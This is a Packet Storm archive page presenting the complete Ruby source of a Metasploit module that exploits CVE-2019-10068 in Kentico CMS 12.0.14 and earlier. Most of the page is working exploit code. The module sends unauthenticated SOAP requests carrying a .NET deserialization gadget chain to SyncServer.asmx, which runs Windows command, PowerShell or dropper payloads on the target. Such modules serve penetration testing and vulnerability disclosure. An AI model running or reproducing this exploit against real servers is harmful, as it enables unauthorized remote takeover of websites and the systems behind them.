what you don't know can hurt you

Kentico CMS 12.0.14 Remote Command Execution

Kentico CMS 12.0.14 Remote Command Execution
Posted May 6, 2020
Authored by aushack, Manoj Cherukuri, Justin LeMay | Site metasploit.com

This Metasploit module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier. Remote command execution is possible via unauthenticated XML requests to the Staging Service SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML input is passed to an insecure .NET deserialize call which allows for remote command execution.

tags | exploit, remote
advisories | CVE-2019-10068
MD5 | 56021ce239bc4ef2d157567974ec70ff

Kentico CMS 12.0.14 Remote Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell

def initialize(info = {})
super(update_info(info,
'Name' => 'Kentico CMS Staging SyncServer Unserialize Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier.
Remote Command Execution is possible via unauthenticated XML requests to the Staging Service
SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML
input is passed to an insecure .NET deserialize call which allows for remote command execution.
},
'DisclosureDate' => '2019-04-15',
'Author' =>
[
'Manoj Cherukuri', # Discovery
'Justin LeMay', # Discovery
'aushack', # msf exploit
],
'References' =>
[
['CVE', '2019-10068'],
['URL', 'https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/']
],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Payload' => { 'DisableNops' => true },
'Targets' => [
[ 'Windows EXE Dropper',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :windows_dropper
],
[ 'Windows Command',
'Arch' => ARCH_CMD,
'Type' => :windows_command,
'Space' => 3000
],
[ 'Windows Powershell',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :windows_powershell
]
]
))

register_options([
OptString.new('TARGETURI', [ true, 'Path to SyncServer.asmx', '/CMSPages/Staging/SyncServer.asmx']),
Opt::RPORT(80)
])
end

def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET'
})

if res && res.body =~ /SyncServer Web Service/i # SOAP endpoint disco / WSDL
return CheckCode::Detected
end

return CheckCode::Safe
end

def exploit
case target['Type']
when :windows_command
execute_command(payload.encoded)
when :windows_dropper
cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
execute_cmdstager({linemax: cmd_target.opts['Space']})
when :windows_powershell
execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
end
end

def execute_command(cmd, opts = {})
sploit = ::Msf::Util::DotNetDeserialization.generate(
cmd,
gadget_chain: :WindowsIdentity,
formatter: :SoapFormatter
)

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/ProcessSynchronizationTaskData'),
'method' => 'POST',
'vars_post' => {'stagingTaskData' => sploit}
})

unless res && res.body.include?('Unable to cast object of type')
fail_with(Failure::UnexpectedReply, 'The payload was rejected')
end
end
end
Login or Register to add favorites

File Archive:

August 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    1 Files
  • 2
    Aug 2nd
    7 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close